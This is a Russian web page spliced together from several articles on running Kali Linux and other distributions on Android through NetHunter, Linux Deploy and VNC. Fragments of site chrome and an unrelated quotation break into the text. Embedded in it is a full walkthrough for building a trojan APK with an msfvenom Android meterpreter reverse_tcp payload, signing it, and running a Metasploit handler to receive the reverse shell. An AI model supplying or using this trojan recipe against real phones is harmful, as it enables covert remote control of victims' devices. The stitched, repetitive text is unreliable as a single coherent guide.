Как без рута превратить Android-телефон в устройство для хакинга

Если хочется проверить ближайшее IT окружение на прочность, а под рукой только смартфон, пригодится Kali Linux для Android. Вот только установка на мобильное устройство имеет свои нюансы. Давайте рассмотрим, как поставить популярный хакерский дистрибутив на Android.

Содержание

Как скачать и установить Kali Linux на Android

Есть два варианта: поддерживается модель устройства на Андроид разработчиками или же нет. Установка Kali будет сильно отличаться.

Как установить для поддерживающихся устройств

Предварительные требования:

  • на Андроиде активирован root;
  • поставлен TWRP (скачать из магазина https://play.google.com/store/apps/details?id=me.twrp.twrpapp);
  • сделан бэкап (желательно).

Доступные варианты специального дистрибутива Kali Linux Android под названием NetHunter представлены на странице https://www.offensive-security.com/kali-linux-nethunter-download/ . Их не так много – для линейки Nexus и для OnePlus One.

image

У совпадающего по модели и версии ОС варианта нужно кликнуть по ZIP (прямая загрузка) или Trnt (скачивание через торрент). Во втором случае потребуется torrent клиент вроде доступного на https://www.utorrent.com/ μTorrent. Скачанный файл необходимо открыть в клиенте (например, через меню Файл) и указать место для сохранения.

image

Начнется процесс скачивания Kali Линукс (на русском).

После завершения нужно скопировать архив SD карту или внутренний накопитель устройства и прошить его через TWRP (в режиме recovery). Детальную информацию на русском по этой программе можно найти на 4pda.ru, там же есть инструкции для различных аппаратов.

Также советуем узнать как скачать образ Кали Линукс ISO. А если вы являетесь владельцем Samsung Galaxy S4 mini и не знаете как установить Кали Линукс, тогда вам сюда.

Если устройства нет в списке

Куда интересней рассмотреть вариант универсальный, который подойдет практически для любого смартфона на Android. Тут тоже потребуются дополнительные приложения – Linux Deploy (не работает без рут) и VNC Viewer. Можно скачать из Google Play.

Сначала потребуется Linux Deploy. Обратите внимание на адрес в заголовке, он еще потребуется, чтобы все заработало.

Надо перейти в настройки (иконка с ползунками) и выбрать Kali Linux в разделе «Дистрибутив».

Затем прокрутить параметры настройки будущего Kali Linux Android вниз и поставить галочки возле SSH и графики, чтобы VNC могла к нему подключаться.

Если потребуется, можно переключить архитектуру, но обычно программа сама корректно выставляет остальные настройки для распаковки на Андроид. Также запишите логин и пароль для входа в Linux. Далее нужно установить дистрибутив на Android. Для этого на главной странице приложения следует нажать «Установить» в выпадающем меню.

Во всплывающем окне нужно согласиться.

Дальше требуется подождать: системе нужно скачать все пакеты для Kali Linux Android.

Указанием на завершение установки будет надпись <<< deploy. Теперь установленную Kali Linux нужно настроить. Делается это из того же выпадающего меню, что и при инсталляции, только пункт будет «Конфигурировать».</p>

Появится еще одно предупреждение.

После завершения можно нажать Start – это запустит дистрибутив Kali в программном контейнере на Android.

Запуск Kali Линукс Android обычно происходит быстрее установки.

После этого нужно перейти в VNC Viewer. Если приложение на смартфоне Android включается впервые, появится приветственная страница.

После них откроется основное окно. Подключение к Kali Linux добавляется нажатием на плюс.

Потребуется ввести тот самый адрес из Linux Deploy, а также имя, чтобы находить подключение в адресной книге на Андроид.

Выглядит это так.

Чтобы увидеть Kali Linux, нужно нажать на подключение и затем на Connect.

Если VNC спросит пароль для подключения, надо указать changeme. Логин и пароль для установленного на Android дистрибутива Kali можно найти в настройках Linux Deploy.

Наконец, откроется рабочий стол Kali Linux Android.

Теперь им можно пользоваться и на Android.

…с каждым днем он все более похож на свой будущий труп (Ж.-П. Сартр). 3 мин для чтения Добавить в избранное 1 мая 2017 В нашем недавнем посте вы мы научились взламывать windows с помощью Kali Linux. На этот раз мы будем взламывать андроид с Kali Linux. Мы сделаем это с использованием инструмента msfvenom в Kali Linux, который является наилучшей комбинацией Msfpayload и Msfencode. Примечание: Данное руководство предназначено только для образовательных целей.

Предпосылки для взлома Android

  1. Kali Linux
  2. Android телефон: Для демонстрационных целей использовался  Android emulator предоставленный Google.

Шаги для взлома Android

1. Создать Payload

Чтобы создать троян для взлома Android, нам нужно создать полезную нагрузку, используя утилиту msfvenom в Kali Linux.

root@destroyer:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.50 LPORT=4444 R > /root/MyPath/my0704.apk  No platform was selected, choosing Msf::Module::Platform::Android from the payload  No Arch selected, selecting Arch: dalvik from the payload  No encoder or badchars specified, outputting raw payload  Payload size: 9485 bytes

В приведенной выше команды LHOST задан IP, используется в команде ifconfig от Kali Linux.

Вышеуказанная команда создает троянский файл apk, который будет установлен на целевой телефон для использования, однако перед этим мы должны подписать этот apk для правильной установки. Следуйте шагам ниже по списку для этого.

а. Создание хранилища ключей:

root@destroyer:~# keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000

Выше команда спрашивает вопросы и пароль.

б. Подписать созданный файл с помощью jarsigner apk.

root@destroyer:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore /root/MyPath/my0704.apk app  Enter Passphrase for keystore:  adding: META-INF/APP.SF  adding: META-INF/APP.RSA  signing: classes.dex  signing: AndroidManifest.xml  signing: resources.arsc  jar signed.     Warning:  No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-08-21) or after any future revocation date.

с. Проверьте apk, созданный с помощью jarsigner.

root@destroyer:~# jarsigner -verify -verbose -certs /root/MyPath/my0704.apk

д. Оптимизация файла с помощью zipalign apk.

Перед тем как начать работу, установите zipalign с помощью команды ниже:

apt-get install zipalign

Теперь позвольте оптимизировать apk.

root@destroyer:~# zipalign -v 4 /root/MyPath/my0704.apk /root/MyPath/my0704_sign.apk  Verifying alignment of /root/MyPath/my0704_sign.apk (4)...  50 META-INF/MANIFEST.MF (OK - compressed)  281 META-INF/APP.SF (OK - compressed)  623 META-INF/APP.RSA (OK - compressed)  1752 META-INF/ (OK)  1802 META-INF/SIGNFILE.SF (OK - compressed)  2087 META-INF/SIGNFILE.RSA (OK - compressed)  2750 classes.dex (OK - compressed)  8726 AndroidManifest.xml (OK - compressed)  10443 resources.arsc (OK - compressed)  Verification successful

Таким образом, наш окончательный apk, который мы используем для взлома андроида назван как «my0704_sign.apk».

2. Запустите msfconsole на Kali Linux для эксплуатации телефона Android.

root@destroyer:~# msfconsole     Call trans opt: received. 05-01-17 20:00:10 REC:Loc          Trace program: running                wake up, Neo...          the matrix has you        follow the white rabbit.               knock, knock, Neo.                             (`.         ,-,                          ` `.    ,;' /                           `.  ,'/ .'                            `. X /.'                  .-;--''--.._` ` (                .'            /   `               ,           ` '   Q '               ,         ,   `._                ,.|         '     `-.;_'            :  . `  ;    `  ` --,.._;             ' `    ,   )   .'                `._ ,  '   /_                   ; ,''-,;' ``-                    ``-..__``--`                                  http://metasploit.com        Easy phishing: Set up email templates, landing pages and listeners  in Metasploit Pro -- learn more on http://rapid7.com/metasploit            =[ metasploit v4.12.22-dev                         ]  + -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]  + -- --=[ 455 payloads - 39 encoders - 8 nops             ]  + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]     msf >

В приведенной выше строке msf запустить полезную нагрузку на андроид и мультиобработчик команд exploit с помощью ниже:

msf > use exploit/multi/handler  msf exploit(handler) > set payload android/meterpreter/reverse_tcp  payload => android/meterpreter/reverse_tcp  msf exploit(handler) >

В команде ниже мы используем IP Kali Linux, может быть взят с помощью команды ifconfig на Kali Linux. Кроме того, мы используем номер порта 4444 для эксплуатации.

msf exploit(handler) > set LHOST 192.168.0.50  LHOST => 192.168.0.50  msf exploit(handler) > set LPORT 4444  LPORT => 4444  msf exploit(handler) >

А затем, наконец, использовать команду, которая будет ждать исполнения apk на телефоне Android.

msf exploit(handler) > exploit     [*] Started reverse TCP handler on 192.168.0.50:4444  [*] Starting the payload handler...

Выполнение apk на андроиде.

Здесь мы используем Android эмулятор предоставленный Google. Следовательно , вам необходимо загрузить образ ISO с сайта Google.

После загрузки вы можете создать нормальную виртуальную машину VMware и смонтировать этот ISO на виртуальной машине, чтобы запустить виртуальную машину машину. Настройка Android VM с помощью id gmail.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Поделиться в соц. сетях:

Читайте также

Как удалить строки в Vim/Vi

30 июля, 2020

Как обновить ядро ​​Gentoo

13 февраля, 2021

Как удалить неотслеживаемые файлы в Git

19 августа, 2019

Изменение учетных записей пользователей с помощью команды Usermod

17 января, 2020

Запись в файл на PHP с помощью fwrite()

14 января, 2021

Разработчик Android VS веб-разработчик. Какой лучше из вариантов для заработка денег

23 марта, 2021

10 основных тенденций разработки приложений для Android. Часть 2

19 мая, 2021

Как включить и отключить кеш Nginx

26 декабря, 2020 Установка Kali Linux на Android устройство из под Linux Deploy.

В качестве устройства был взят планшет Samsung Galaxy Tab 2, модель P3100 c экраном размером 7.0 дюймов. Далее будет рассмотрен вариант установки Kali Linux на Android OS планшет при помощью специальной программы Linux Deploy. Благодаря поддержке arm чипов, появилась возможность установить Kali linux на планшет в качестве основной системы. В принципе, можно установить любой дистрибутив, почти на любое ваше Android устройство. Но об этом позже, а сейчас начнем описание установки Kali Linux на плашет с Androidиз OS при помощи Linux Deploy. Итак нам понадобится:

  1. Порутаный девайс с OS Android версии 2.2 и выше на борту, процессором ARM v7от 800Mhz, и колличеством ОЗУ более 500mb. Ещё не получили root права и не знаете как? В помощь полезная статья: Как получить root права наSamsung Galaxy tab 27.0 P3100.
  2. Программа Linux Deploy.
  3. Минимум 1gb свободного места на устройстве  или sd-карте.

Что за хрень, этот Linux Deploy и как его «раскурить». Linux Deploy — это программа для простой и быстрой установки операционной системы (ОС) Linux на устройство Android. Она создает образ диска на флеш-карте, монтирует его и устанавливает туда дистрибутив ОС Linux. Приложения из новой системы запускаются в chroot окружении параллельно со штатной работой платформы Android. Все вносимые изменения на устройстве обратимы, т.е. приложение и созданные им компоненты можно полностью удалить. Приложению требуются привилегии суперпользователя (ROOT). Интерфейс программы поддерживает английский и русский языки. Через интерфейс программы можно управлять процессом установки ОС, а после установки можно запускать и останавливать службы новой системы (есть поддержка запуска своих сценариев). Процесс установки отображается в виде текстовых отчетов в главном окне приложения. Во время установки программа сама настраивает рабочее окружение, которое включает в себя базовую систему, сервер SSH, сервер VNC и графическую среду на выбор. Установка новой ОС занимает около 30 минут. Рекомендованный минимальный размер образа диска без графического интерфейса — 512 МБ, а с графическим интерфейсом — 1024 МБ (для LXDE). При установке ОС в образ на карту памяти с файловой системой FAT32 размер образа не должен превышать 4095 МБ! ХАРАКТЕРИСТИКИ ПРИЛОЖЕНИЯ LINUX DEPLOY: Поддерживаемые дистрибутивы: Debian, Ubuntu, Arch Linux, Fedora, openSUSE, Kali Linux, GentooТип установки: файл, раздел, директорияПоддерживаемые файловые системы: ext2, ext3, ext4Интерфейс управления: SSH, VNC, X, фрейм-буфер Окружение рабочего стола: XTerm, LXDE, Xfce, GNOME, KDEПоддерживаемые языки: русский, английский Скачать LINUX DEPLOY 1.4.3: linux_deploy_1_4_3.apk                     linux_deploy_1_4_3.zip Препараты в наличии, Приходы на подходах — можно начинать!

  • После установки Linux Deploy, заходим в профиль Linux    (необходимо будет создать свой персональный).
  • Сначала двигаем в меню —> настройки. Там вклчаем опцию «Не отключать экран» и ставим русский язык. Остальное не трогаем и  нажимаем
  • Когда все закончится нажимаем на кнопку Download (стрелочка вниз), где  мы видим информацию об устанавливаемом дистрибутиве.
  • Выбираем в меню дистрибутив «Kali Linux«. Все пункты оставляем как есть, кроме локализации — ставим ru_RU.UTF-8, окружение рабочего стола — ставим Xfce и ставим галочку «Установить GUI»(можно не ставить). 
  • Следующий шаг — жмём пункт «Установить»
  • Установка займет примерно 30-40 минут, в процессе установки желательно ничего не делать, а только ждать, оставив девайс в покое. В конце установки вылезет строчка : —> end —> Install
  • Только что мы с Вами ровно за 6сек. установили Kali Linux на Android. Примите мои поздравления!

Теперь можно и даже нужно, запустить новенькую Ось Kali Linux — нажимаем кнопку «Старт» и запускаем машину. Если вы ничего не меняли в настройках при установке, можно запросто подключаться локально  к вашей системе при помощи andriod VNC viewer (при использовании VNC), или при помощи connectbot ( в случае с SSH соединением). Подключаемся к локальному хосту по адресу localhost логин android, пароль — changeme. На root доступ в свежеустановленной системе пароля нет, меняем его, выполнив в консоли команду: sudo passwd root. Если вы уже скачали поный дистрибутив Kali Linux, то далее необходимо в настройках указать его расположение и версию. Затем,не нажимая кнопку «установить», можете обновить конфигурацию, не забыв при этом убрать галочку «установить GUI». Кроме Kali Linux вы вправе поставить на своё устройство любой другой дистрибутив Linux, при условии что он поддерживает процессоры с архитектурой ARM.Необходимые Файлы:Скачать Linux Deploy 1.4.3 (apk):linux_deploy_1_4_3.apkСкачать andriod VNC viewer (apk):andriod_VNC_viewer_0_5_0.apkСкачать ConnectBot (apk):Connectbot_1_7_1.apk А вот и скрины работающей системы:

Важное примечание:

  • Эксперимент по установке проводился на Samsung Galaxy tab 2 7.0

Kali Linux — одна из лучших хакеров операционных систем, исследователей безопасности и пентестеров. Он предоставляет сотни инструментов для пентестов, а его простота использования позволяет понять, почему он является частью инструментария каждого специалиста по безопасности.

К счастью, Android основан на Linux, что делает возможным установку Kali практически на любом устройстве Android на базе ARM. Kali на телефонах и вкладках Android может предоставить пользователям возможность выполнять свои действия на ходу.

Следующие методы демонстрируют, как установить Kali Linux на ваш телефон Android. Основные требования включают полностью заряженное устройство Android, не менее 4 ГБ свободного места и подключение к Интернету.

Использование Linux Deploy

Прежде чем продолжить этот метод, вы должны иметь следующее:

  • Укоренившееся устройство Android
  • Busybox
  • Linux Deploy
  • Android VNC Viewer
  1. Запустите приложение Linux Deploy со своего устройства и нажмите Скачать кнопка внизу. Вы попадете на страницу свойств.
  2. В свойствах нажмите распределение и выберите Kali Linux. Прокрутите вниз и измените свое имя пользователя и пароль под Имя пользователя а также Пользовательский пароль Вы можете оставить все как есть, если не возражаете. Кроме того, если вы предпочитаете использовать SSH и GUI, вы можете включить их в том же списке параметров.
  3. Вернитесь на главную страницу, нажмите «Параметры» (меню из трех точек), а затем нажмите устанавливать. Нажмите Хорошо когда появится экран подтверждения.
  4. Загрузка займет некоторое время в зависимости от скорости вашего интернета. Образ Kali Linux должен быть где-то около 4 ГБ или меньше. После завершения установки Linux Deploy может смонтировать ваш образ Kali Linux.
  5. После завершения загрузки нажмите Начните. На этом этапе развертывание Linux помечает VNC и SSH-сервер внутри вашего хромированного образа Kali. Если вы включили графический интерфейс, у вас должен быть графический интерфейс вместо текстового интерфейса, с которого вы можете работать.
  6. По желанию, запустите приложение VNC Viewer на вашем Android. IP-адрес вашего экземпляра Kali будет отображаться в верхней части экрана, с которым вы будете устанавливать соединение.
  7. Войдите с именем пользователя и паролем, указанными в свойствах. Если это не работает, попробуйте ввести следующие учетные данные: локальный Пароль: Измени меня

Читайте также:  Лучше, чем блокнот: 3 самых быстрых способа записать заметки на Android

Вы также можете использовать ssh для доступа к вашей установке Kali Linux.

Если вы читаете это, вы, вероятно, раньше использовали Linux и знаете, что это работает практически на любом оборудовании. Между тем, у вас в кармане телефон, и вы знаете, что он универсален. Так может ли ваш телефон Android работать под управлением Linux?

Да, он может. Вот что вам нужно знать о запуске Linux на вашем Android смартфоне или планшете.

Подождите, разве Android уже не Linux?

Ну, это так, но не совсем…

Android построен на ядре Linux, программном стеке, который взаимодействует с аппаратным обеспечением устройства. Это в основном позволяет операционной системе взаимодействовать с устройством, будь то ПК, смартфон или другое оборудование.

Операционная система Linux на самом деле должна называться GNU/Linux. Но со временем слово «Linux» стало взаимозаменяемо описывать ядро, а также различные операционные системы, которые его используют, такие как Ubuntu, Gentoo и многие другие.

Так что, хотя Android использует ядро ​​Linux, он не предлагает среду рабочего стола. Это то, о чем думает большинство людей, когда рассматривают способы установки Linux на Android.

Зачем запускать Linux на вашем Android-устройстве?

Так почему же вы хотите иметь среду рабочего стола Linux на своем телефоне или планшете Android?

Вы можете запустить приложение, которое недоступно на Android. Но в большинстве случаев вам просто нужно получить доступ к какой-либо среде рабочего стола. Современные устройства Android имеют идеальное аппаратное обеспечение для работы с ПК, и установка Linux — отличный способ сделать это.

Конечно, вы можете обнаружить, что задачи, которые вы хотите выполнять в Linux, также работают в Android. Единственным препятствием, сдерживающим вас, может быть одновременная многозадачность приложения. К счастью, эта функция доступна в Android начиная с Android 7.0 Nougat 2016 года.

Запустить Linux на вашем Android-устройстве непросто, поэтому, если вы ищете многозадачность, попробуйте перейти на современную версию Android.

Чтобы запустить Linux на Android, у вас есть несколько вариантов. Какой из них использовать, зависит от того, является ли ваше Android-устройство рутованным или нет.

Как запустить Linux на Android (без рута)

Лучший способ запустить Linux на вашем телефоне с минимальными усилиями — это Debian Noroot.

Хотя это полезно, к сожалению, это приложение больше не поддерживается. Он работает только на Android 2.3 Gingerbread до Android 5.0 Jellybean.

Преимущество Debian Noroot состоит в том, что он установит Debian Jessie на ваш телефон со слоем совместимости. Это позволяет вам запускать приложения Debian без необходимости рутировать Android. Учитывая, насколько сложно рутирование для некоторых устройств, это полезно.

Производительность с Debian Noroot невелика, но она полезна. Для достижения наилучших результатов при использовании Linux на Android сначала попробуйте рутировать устройство.

Загрузить:Debian Noroot (бесплатно)

Как запустить Linux на Android (с рутом)

Если у вас есть рутированное устройство, вы можете установить различные версии Linux на Android, используя инструмент Linux Deploy. Лучше всего это сделать, сначала подключив телефон к сети Wi-Fi.

Начните с установки BusyBox, который предоставляет некоторые расширенные возможности root.

Далее установите Linux Deploy. При первом запуске нажмите «Пуск», чтобы убедиться, что корневые разрешения включены, а затем нажмите кнопку «Настройки» в правом нижнем углу.

Используйте это меню параметров, чтобы выбрать предпочитаемый дистрибутив . Debian, Ubuntu, Gentoo, Fedora и многие другие доступны для установки. Мы использовали Arch Linux.

Вам необходимо установить флажок Включить в графическом интерфейсе, чтобы просмотреть рабочий стол Linux на вашем телефоне, и убедиться, что VNC выбран для графической подсистемы. Затем проверьте разрешение экрана в настройках GUI и убедитесь, что вы довольны средой рабочего стола.

Наконец, найдите записи Имя пользователя и Пароль пользователя и запишите их или измените на более запоминающиеся для вас.

Выйдите из этого меню, затем нажмите три точки в верхнем правом углу и выберите «Установить», затем нажмите «ОК» .

Когда это будет сделано, установите VNC Viewer из Play Store. В Linux Deploy нажмите «Пуск» для запуска Linux. Затем откройте VNC Viewer и подключитесь к localhost:5900, чтобы просмотреть рабочий стол Linux с учетными данными, которые вы ввели ранее.

После запуска вы можете установить программное обеспечение Linux с помощью терминала обычным способом.

Поздравляем: теперь у вас Linux работает на Android!

image

Как установить Kali Linux на Android (требуется рут)

Вышеприведенный метод Linux Deploy для запуска дистрибутивов Linux на Android, вероятно, самый лучший. Доступен хороший выбор версий Linux, включая Kali Linux.

Хотите использовать Android в качестве устройства для тестирования на проникновение? В то время как доступны различные полезные сетевые инструменты для Android, лучшим вариантом является портативная версия Kali Linux. Просто следуйте инструкциям выше, используя Linux Deploy, и выберите Kali Linux для установки на Android.

После установки у вас в кармане будет портативное решение для ручного тестирования, готовое проверить безопасность любой сети. проверить безопасность которому подключается ваш телефон.

4 других способа запуска Linux на Android

Хотя мы рассмотрели несколько хороших вариантов запуска Linux на вашем Android-устройстве, у вас есть и другие доступные методы:

  1. DeX: Если у вас есть современное устройство Samsung, у вас есть возможность переключить аппаратное обеспечение в режим рабочего стола с DeX Хотя это не совсем операционная система Linux, это среда рабочего стола с ядром Linux, поэтому она достаточно близка.
  2. Удаленный рабочий стол для системы под управлением Linux с Splashtop или другим удаленным решением -Linux
  3. Limbo: Это эмулятор Linux для Android, основанный на эмуляторе QEMU. Тем не менее, это сложно и требует много времени для настройки, и результаты часто не стоят усилий.
  4. Двойная загрузка Android с Ubuntu Touch . Подключите устройство к дисплею HDMI, чтобы увидеть среду рабочего стола Ubuntu Touch.

Или просто установите пользовательский Android ROM

Не уверен, что установка Linux — это хорошая идея, но хотите изменить способ использования своего Android-устройства? Вы можете просто попробовать другую версию Android со встроенным рабочим столом. Мы рассмотрели ОС Maru, которую вы можете установить на некоторые устройства в виде пользовательского ПЗУ. Это идет со стандартным режимом телефона и режимом рабочего стола, с хорошими результатами.

Оцените статью
Рейтинг автора
5
Материал подготовил
Илья Коршунов
Наш эксперт
Написано статей
134
Citilink-kabinet.ru
Добавить комментарий